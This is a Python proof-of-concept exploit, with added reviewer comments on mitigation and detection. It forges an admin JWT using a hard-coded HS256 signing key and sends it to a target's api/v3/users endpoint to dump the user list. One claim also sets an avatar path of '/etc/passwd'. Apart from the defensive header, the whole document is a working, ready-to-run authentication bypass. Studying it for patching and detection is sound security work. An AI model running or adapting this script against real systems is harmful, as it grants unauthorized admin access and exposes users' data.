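### Discovery: Omri Baso & Fabien Aunay
### Exploit Author: Omri Baso
#
# Reviewer notes (defensive reading of this proof of concept):
# - Root cause shown here: the script mints its own HS256 token with a fixed,
#   publicly known key. It is accepted only by a deployment that still verifies
#   tokens with that same key (presumably a shipped default; confirm against
#   the product's configuration).
# - Mitigation: give every deployment its own randomly generated signing
#   secret, and restart or re-issue sessions so tokens signed with the old key
#   stop validating.
# - Detection: look for admin-scoped calls to api/v3/users whose bearer token
#   was never issued by a preceding login. Requests from this script also
#   carry a fixed Chrome/96 User-Agent and a malformed Referer (see main()).
import sys

try:
    import jwt
except ImportError:
    print("\n[-] python3 -m pip install jwt")
    sys.exit(1)

import requests
from datetime import datetime, timedelta, timezone


def _wrong_jwt_package():
    """Explain that the installed ``jwt`` module is PyJWT, then exit with status 1."""
    print("\n[-] python3 -m pip uninstall PyJWT")
    print("\n[-] python3 -m pip install jwt")
    print("\n[-] Exploit is not written using PyJWT!")
    sys.exit(1)


try:
    # These submodules belong to the `jwt` distribution, not PyJWT. Importing
    # them under a guard reports the package mix-up with the intended message
    # instead of an import traceback.
    from jwt.utils import get_int_from_datetime
    from jwt.jwk import OctetJWK
except ImportError:
    _wrong_jwt_package()

# Seconds to wait for the HTTP response before giving up.
REQUEST_TIMEOUT = 15


def main():
    """Sign an admin token with the fixed key and request the user list.

    Reads the base URL from ``sys.argv[1]``, builds a claim set with a 24 hour
    expiry, signs it with HS256, and sends one GET to ``<base>/api/v3/users``
    with the token as a bearer credential. Prints the response body, and the
    token when the server answers with status 201. Exits with status 1 on bad
    usage, on a ``jwt`` package mix-up, or when the request cannot complete.
    """
    if len(sys.argv) < 2:
        print("\n[-] Usage: %s %s " % (sys.executable,sys.argv[0]))
        print("Example:\n\t%s %s http://127.0.0.1:9080/" % (sys.executable,sys.argv[0]))
        sys.exit(1)

    target = sys.argv[1]

    try:
        # Fixed signing key: the whole issue reduces to the server trusting
        # tokens signed with a value that is not unique to the deployment.
        key = OctetJWK(b"167f0db2-f83e-4baa-9736-d56064a5b415")
    except Exception:
        _wrong_jwt_package()

    message = {"username":"admin" ,"useradmin": True,"usergroup":"admin","externalauth": False,"externaltype":"","displayname":"Homer Admin","avatar":"/etc/passwd",
        'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(hours=24)),
    }

    instance = jwt.JWT()
    print("\n\n[+] Generating the following cookie: \n\n%s\n\n" % message)
    admin_cookie = instance.encode(message, key, alg='HS256')

    if(admin_cookie):
        if not (target.endswith("/")):
            target += "/"

        target = target + "api/v3/users"
        # NOTE(review): Referer is formatted from the already-extended URL, so
        # it reads "<base>/api/v3/userspreference/users". Kept as the original
        # sends it; the malformed value is a usable log indicator.
        headers = {"Accept": "application/json, text/plain, */*", "Authorization": "Bearer %s" % admin_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Referer": "%spreference/users" % target, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}

        try:
            # A timeout keeps the script from hanging on an unresponsive host.
            r = requests.get(target, headers=headers, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as err:
            print("[-] failed")
            print(err)
            sys.exit(1)

        # The script treats 201 (not 200) as the success status for this call.
        if(r.status_code == 201):
            print("[+] Obtained Admin access!!\n")
            print("\n\n[+] Dumping Users\n\n")
            print("----------------------------------------------")
            print(r.text)
            print("\n[+] Admin Cookie: \n%s" % admin_cookie)
        else:
            print("[-] failed")
            print(r.text)


# Guarded so that importing this file never sends a request.
if __name__ == "__main__":
    main()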